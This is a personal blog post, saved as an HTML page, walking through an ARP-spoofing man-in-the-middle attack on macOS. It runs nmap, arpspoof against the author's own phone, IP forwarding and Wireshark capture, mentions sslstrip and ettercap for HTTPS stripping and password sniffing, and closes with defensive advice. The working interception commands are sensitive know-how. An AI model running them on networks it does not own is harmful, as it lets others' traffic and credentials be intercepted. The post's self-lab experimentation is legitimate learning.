<!doctype html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta http-equiv=content-language content="en"><meta name=color-scheme content="light dark"><meta name=author content="无生"><meta name=description content="之前知乎看到一篇通过手机app就能直接监听到局域网内的其他用户的数据包，并且自动抓取图片和嗅探密码的答案，觉得这样也能成功实在太夸张了。于是自己实现一下，App开发不来，就在Mac上进行好了（事实上用到的也都是别人写好的程序）
安装工具    首先安装Macport, 它是一个类似于apt-get和brew的一个包管理工具，通过port我们可以很方便的安装需要的各种工具。
如果安装之后发现仍然找不到port命令的，可以
export PATH=/opt/local/bin:/opt/local/sbin:$PATH 将其加入到系统路径里来。
port安装好之后就可以开始安装各种工具了
sudo port install arpspoof sudo port install nmap 其实还有sslstrip和ettercap，不过后面两个更多的用于攻击，我们只需要体验一下中间人攻击就好了，事实上是ettercap安装不成功。
nmap扫描整个局域网段    直接执行命令
sudo nmap -sS 192.168.1.0/24 结果如下：
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-09 17:50 CST Nmap scan report for 192.168.1.1 Host is up (0.0022s latency). Not shown: 998 filtered ports PORT STATE SERVICE 80/tcp open http 1900/tcp open upnp MAC Address: ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇ (Tp-link Technologies)  Nmap scan report for 192."><meta name=keywords content="blog,developer,personal"><meta name=twitter:card content="summary"><meta name=twitter:title content="Macos进行局域网arp欺骗"><meta name=twitter:description content="之前知乎看到一篇通过手机app就能直接监听到局域网内的其他用户的数据包，并且自动抓取图片和嗅探密码的答案，觉得这样也能成功实在太夸张了。于是自己实现一下，App开发不来，就在Mac上进行好了（事实上用到的也都是别人写好的程序）
安装工具    首先安装Macport, 它是一个类似于apt-get和brew的一个包管理工具，通过port我们可以很方便的安装需要的各种工具。
如果安装之后发现仍然找不到port命令的，可以
export PATH=/opt/local/bin:/opt/local/sbin:$PATH 将其加入到系统路径里来。
port安装好之后就可以开始安装各种工具了
sudo port install arpspoof sudo port install nmap 其实还有sslstrip和ettercap，不过后面两个更多的用于攻击，我们只需要体验一下中间人攻击就好了，事实上是ettercap安装不成功。
nmap扫描整个局域网段    直接执行命令
sudo nmap -sS 192.168.1.0/24 结果如下：
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-09 17:50 CST Nmap scan report for 192.168.1.1 Host is up (0.0022s latency). Not shown: 998 filtered ports PORT STATE SERVICE 80/tcp open http 1900/tcp open upnp MAC Address: ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇ (Tp-link Technologies)  Nmap scan report for 192."><meta property="og:title" content="Macos进行局域网arp欺骗"><meta property="og:description" content="之前知乎看到一篇通过手机app就能直接监听到局域网内的其他用户的数据包，并且自动抓取图片和嗅探密码的答案，觉得这样也能成功实在太夸张了。于是自己实现一下，App开发不来，就在Mac上进行好了（事实上用到的也都是别人写好的程序）
安装工具    首先安装Macport, 它是一个类似于apt-get和brew的一个包管理工具，通过port我们可以很方便的安装需要的各种工具。
如果安装之后发现仍然找不到port命令的，可以
export PATH=/opt/local/bin:/opt/local/sbin:$PATH 将其加入到系统路径里来。
port安装好之后就可以开始安装各种工具了
sudo port install arpspoof sudo port install nmap 其实还有sslstrip和ettercap，不过后面两个更多的用于攻击，我们只需要体验一下中间人攻击就好了，事实上是ettercap安装不成功。
nmap扫描整个局域网段    直接执行命令
sudo nmap -sS 192.168.1.0/24 结果如下：
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-09 17:50 CST Nmap scan report for 192.168.1.1 Host is up (0.0022s latency). Not shown: 998 filtered ports PORT STATE SERVICE 80/tcp open http 1900/tcp open upnp MAC Address: ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇ (Tp-link Technologies)  Nmap scan report for 192."><meta property="og:type" content="article"><meta property="og:url" content="https://blog.mkdef.com/posts/macos%E8%BF%9B%E8%A1%8C%E5%B1%80%E5%9F%9F%E7%BD%91arp%E6%AC%BA%E9%AA%97/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2016-05-10T11:09:02+08:00"><meta property="article:modified_time" content="2016-05-10T11:09:02+08:00"><title>Macos进行局域网arp欺骗 · Coder</title><link rel=canonical href=https://blog.mkdef.com/posts/macos%E8%BF%9B%E8%A1%8C%E5%B1%80%E5%9F%9F%E7%BD%91arp%E6%AC%BA%E9%AA%97/><link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin><link rel=stylesheet href=/css/coder.min.d9fddbffe6f27e69985dc5fe0471cdb0e57fbf4775714bc3d847accb08f4a1f6.css integrity="sha256-2f3b/+byfmmYXcX+BHHNsOV/v0d1cUvD2Eesywj0ofY=" crossorigin=anonymous media=screen><link rel=stylesheet href=/css/coder-dark.min.002ee2378e14c7a68f1f0a53d9694ed252090987c4e768023fac694a4fc5f793.css integrity="sha256-AC7iN44Ux6aPHwpT2WlO0lIJCYfE52gCP6xpSk/F95M=" crossorigin=anonymous media=screen><link rel=icon type=image/png href=/images/favicon-32x32.png sizes=32x32><link rel=icon type=image/png href=/images/favicon-16x16.png sizes=16x16><link rel=apple-touch-icon href=/images/apple-touch-icon.png><link rel=apple-touch-icon sizes=180x180 href=/images/apple-touch-icon.png><meta name=generator content="Hugo 0.97.3"></head><body class="preload-transitions colorscheme-auto"><div class=float-container><a id=dark-mode-toggle class=colorscheme-toggle><i class="fa fa-adjust fa-fw" aria-hidden=true></i></a></div><main class=wrapper><nav class=navigation><section class=container><a class=navigation-title href=/>Coder</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle><i class="fa fa-bars fa-fw" aria-hidden=true></i></label><ul class=navigation-list><li class=navigation-item><a class=navigation-link href=/posts/>Blog</a></li><li class=navigation-item><a class=navigation-link href=/about/>About</a></li></ul></section></nav><div class=content><section class="container post"><article><header><div class=post-title><h1 class=title><a class=title-link href=https://blog.mkdef.com/posts/macos%E8%BF%9B%E8%A1%8C%E5%B1%80%E5%9F%9F%E7%BD%91arp%E6%AC%BA%E9%AA%97/>Macos进行局域网arp欺骗</a></h1></div><div class=post-meta><div class=date><span class=posted-on><i class="fa fa-calendar" aria-hidden=true></i>
<time datetime=2016-05-10T11:09:02+08:00>May 10, 2016</time></span>
<span class=reading-time><i class="fa fa-clock-o" aria-hidden=true></i>
2-minute read</span></div><div class=tags><i class="fa fa-tag" aria-hidden=true></i>
<span class=tag><a href=/tags/osx/>osx</a></span>
<span class=separator>•</span>
<span class=tag><a href=/tags/arpspoof/>arpspoof</a></span>
<span class=separator>•</span>
<span class=tag><a href=/tags/wireshark/>wireshark</a></span></div></div></header><div><p>之前知乎看到一篇通过手机app就能直接监听到局域网内的其他用户的数据包，并且自动抓取图片和嗅探密码的答案，觉得这样也能成功实在太夸张了。于是自己实现一下，App开发不来，就在Mac上进行好了（事实上用到的也都是别人写好的程序）</p><h4 id=安装工具>安装工具
<a class=heading-link href=#%e5%ae%89%e8%a3%85%e5%b7%a5%e5%85%b7><i class="fa fa-link" aria-hidden=true></i></a></h4><p>首先安装<a href=https://www.macports.org/>Macport</a>, 它是一个类似于apt-get和brew的一个包管理工具，通过port我们可以很方便的安装需要的各种工具。</p><p>如果安装之后发现仍然找不到port命令的，可以</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>export PATH=/opt/local/bin:/opt/local/sbin:$PATH
</span></span></code></pre></div><p>将其加入到系统路径里来。</p><p>port安装好之后就可以开始安装各种工具了</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>sudo port install arpspoof
</span></span><span style=display:flex><span>sudo port install nmap
</span></span></code></pre></div><p>其实还有<code>sslstrip</code>和<code>ettercap</code>，不过后面两个更多的用于攻击，我们只需要体验一下中间人攻击就好了，<del>事实上是ettercap安装不成功</del>。</p><h4 id=nmap扫描整个局域网段>nmap扫描整个局域网段
<a class=heading-link href=#nmap%e6%89%ab%e6%8f%8f%e6%95%b4%e4%b8%aa%e5%b1%80%e5%9f%9f%e7%bd%91%e6%ae%b5><i class="fa fa-link" aria-hidden=true></i></a></h4><p>直接执行命令</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>sudo nmap -sS 192.168.1.0/24
</span></span></code></pre></div><p>结果如下：</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-09 17:50 CST
</span></span><span style=display:flex><span>Nmap scan report for 192.168.1.1
</span></span><span style=display:flex><span>Host is up (0.0022s latency).
</span></span><span style=display:flex><span>Not shown: 998 filtered ports
</span></span><span style=display:flex><span>PORT     STATE SERVICE
</span></span><span style=display:flex><span>80/tcp   open  http
</span></span><span style=display:flex><span>1900/tcp open  upnp
</span></span><span style=display:flex><span>MAC Address: ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇ (Tp-link Technologies)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Nmap scan report for 192.168.1.111
</span></span><span style=display:flex><span>Host is up (0.0062s latency).
</span></span><span style=display:flex><span>Not shown: 999 closed ports
</span></span><span style=display:flex><span>PORT      STATE SERVICE
</span></span><span style=display:flex><span>62078/tcp open  iphone-sync
</span></span><span style=display:flex><span>MAC Address: ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇ (Apple)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Nmap scan report for 192.168.1.112
</span></span><span style=display:flex><span>Host is up (0.000017s latency).
</span></span><span style=display:flex><span>All 1000 scanned ports on 192.168.1.112 are closed (500) or filtered (500)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Nmap done: 256 IP addresses (3 hosts up) scanned in 51.06 seconds
</span></span></code></pre></div><p>其中192.168.1.1是局域网的网关，192.168.1.111是我的手机，192.168.1.112是我的本机。这是特意趁家里只有我一个人的时候扫描的，一旦有其他人接入wifi，就会出现更多的结果。</p><p>暂时不清楚这个工具的原理，有的时候不会显示手机的结果，当然一个可能的原因是iphone待机时自动断wifi，而不是工具的锅。</p><p>扫描过后就可以通过查看路由表来查看局域网内的ip信息了</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>~netstat -r
</span></span><span style=display:flex><span>Routing tables
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Internet:
</span></span><span style=display:flex><span>Destination        Gateway            Flags        Refs      Use   Netif Expire
</span></span><span style=display:flex><span>default            192.168.1.254      UGSc          323        0     en0
</span></span><span style=display:flex><span>127                localhost          UCS             1        0     lo0
</span></span><span style=display:flex><span>localhost          localhost          UH             28  4818622     lo0
</span></span><span style=display:flex><span>169.254            link#4             UCS             1        0     en0
</span></span><span style=display:flex><span>192.168.1          link#4             UCS             4        0     en0
</span></span><span style=display:flex><span>192.168.1.207      link#4             UHLWIi          1        2     en0
</span></span><span style=display:flex><span>192.168.1.208      link#4             UHLWIi          1        2     en0
</span></span><span style=display:flex><span>192.168.1.250/32   link#4             UCS             1        0     en0
</span></span><span style=display:flex><span>192.168.1.254/32   link#4             UCS             2        0     en0
</span></span><span style=display:flex><span>192.168.1.254      ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇  UHLWIir       324       16     en0    171
</span></span><span style=display:flex><span>192.168.1.255      link#4             UHLWbI          1       12     en0
</span></span><span style=display:flex><span>224.0.0            link#4             UmCS            2        0     en0
</span></span><span style=display:flex><span>224.0.0.251        ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇  UHmLWI          1        0     en0
</span></span><span style=display:flex><span>255.255.255.255/32 link#4             UCS             1        0     en0
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Internet6:
</span></span><span style=display:flex><span>Destination        Gateway            Flags         Netif Expire
</span></span><span style=display:flex><span>localhost          localhost          UHL             lo0
</span></span><span style=display:flex><span>fe80::%lo0         fe80::1%lo0        UcI             lo0
</span></span><span style=display:flex><span>fe80::1%lo0        link#1             UHLI            lo0
</span></span><span style=display:flex><span>fe80::%en0         link#4             UCI             en0
</span></span><span style=display:flex><span>shaobos-macbook-pr ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇  UHLI            lo0
</span></span><span style=display:flex><span>fe80::%awdl0       link#9             UCI           awdl0
</span></span><span style=display:flex><span>shaobos-macbook-pr ▇▇:▇▇:▇▇:▇▇:▇▇:▇▇  UHLI            lo0
</span></span><span style=display:flex><span>ff01::%lo0         localhost          UmCI            lo0
</span></span><span style=display:flex><span>ff01::%en0         link#4             UmCI            en0
</span></span><span style=display:flex><span>ff01::%awdl0       link#9             UmCI          awdl0
</span></span><span style=display:flex><span>ff02::%lo0         localhost          UmCI            lo0
</span></span><span style=display:flex><span>ff02::%en0         link#4             UmCI            en0
</span></span><span style=display:flex><span>ff02::%awdl0       link#9             UmCI          awdl0
</span></span></code></pre></div><p>这是我在公司未扫描时的结果，可以看到只包含部分信息，但是如果<code>ping</code>一个不在表内的ip，这个新的ip就会被添加到路由表中。</p><p>通过这个步骤，我们就能知道局域网里还有哪些机器，然后我们就可以选定一个目标，开始攻击了。</p><h4 id=arp欺骗>arp欺骗
<a class=heading-link href=#arp%e6%ac%ba%e9%aa%97><i class="fa fa-link" aria-hidden=true></i></a></h4><p>这里选用我的手机192.168.1.111进行攻击，使用<code>arpspoof</code>。</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>arpspoof -i en0 -t 192.168.1.111 192.168.1.1
</span></span></code></pre></div><p>这个命令是告诉192.168.1.111这个机器，我是192.168.1.1，也就是你的网关，你的包就发给我吧，这样我就能在我的en0上监听到来自192.168.1.111的发包了。</p><p>但是这样一来，192.168.1.111就断网了，因为它的包发给了我，而没能转发出去。这个时候手机上会出现一个比较奇怪的现象，就是微信能收到小伙伴的消息，但是却发不出去。实测有极少量的消息还是发送出去了，可能是由于我们的arp欺骗是持续反复进行的，中间的间隙导致了包还是发给了网管。但是无论如何，这个时候目标机器的网络连接是不正常的。</p><h4 id=ip转发>ip转发
<a class=heading-link href=#ip%e8%bd%ac%e5%8f%91><i class="fa fa-link" aria-hidden=true></i></a></h4><p>打开ip转发功能后，就能把192.168.1.111的包转发给网管了，命令如下：</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>sysctl -w net.inet.ip.forwarding=1
</span></span></code></pre></div><p>本来以为会有各种复杂的设置，比如哪些转发，哪些不转，比如怎么转，转到哪去之类的。结果发现，打开之后，我的手机直接就能正常上网了，丝毫没有异样。<del>这时，我们就能放心大胆的进行监听而不用担心被发现了</del>。</p><h4 id=抓包>抓包
<a class=heading-link href=#%e6%8a%93%e5%8c%85><i class="fa fa-link" aria-hidden=true></i></a></h4><p>抓包的方法很多，最方便的还是<a href=https://www.wireshark.org/>wireshark</a>。直接监听之前设置的端口en0，然后设置过滤条件<code>ip.src == 192.168.1.111</code>，然后就可以看到目标机器的各种请求了。</p><p>这里上个监听结果的图</p><p><img src=/uploads/sniffer_result.png alt></p><p>其中，右上角的小图是我的朋友圈截图，大图是我在手机上点开图片之后，在Mac上监听到的请求，然后在浏览器上打开的结果。如果是在看视频，则会监听到连续的视频片段，可以一段一段下载下来看到。</p><h4 id=more>More
<a class=heading-link href=#more><i class="fa fa-link" aria-hidden=true></i></a></h4><p>当然我们这里仅仅监听了目标机器发送的包，同样的原理，我们可以欺骗网关，我们才是目标机器，这样我们就能监听到双向的消息了，而且目标机器仍然能够正常上网。</p><p>在这基础上，通过<code>sslstrip</code>可以建立假的<code>https</code>链接，这样就能明文看到本来是通过<code>https</code>加密过的消息，但是这样一来，目标机器是否还能正常使用不明，有待后续尝试。</p><p>通过<code>ettercap</code>则可以方便的完成上述过程，并且自动嗅探出其中的账号密码信息，估计就是加入一些常用的账号密码字段，或者关键字来提取的吧。</p><h4 id=防范>防范
<a class=heading-link href=#%e9%98%b2%e8%8c%83><i class="fa fa-link" aria-hidden=true></i></a></h4><p>可以看到，这个方法的杀伤力还是很可怕的，虽然伤害范围有限，但是如果应用到出租屋，宾馆这种环境中，还是非常危险的。所以在公共场合还是尽量少的链接公共wifi。</p><p>关于防范措施，要么没必要防范，比如自己家中的wifi，设好密码不让外人连就好，要么没有权限防范，比如宾馆这种，路由不归你管。如果要在自己机器这个层面上防范暂时不知道有没有什么简单的方法，windows机器可以安装360防火墙，手机不明。</p><p>所以最好的方法还是定期修改密码，所有账号都绑定手机和安全邮箱，在公共wifi不登录敏感的账号等等。</p></div><footer></footer></article></section></div><footer class=footer><section class=container>©
2016 -
2022
无生
·
Powered by <a href=https://gohugo.io/>Hugo</a> & <a href=https://github.com/luizdepra/hugo-coder/>Coder</a>.</section></footer></main><script src=/js/coder.min.8fb86376a16e684af472a329aef502dbebcfab65ce264e9750d144912947c602.js integrity="sha256-j7hjdqFuaEr0cqMprvUC2+vPq2XOJk6XUNFEkSlHxgI="></script></body></html>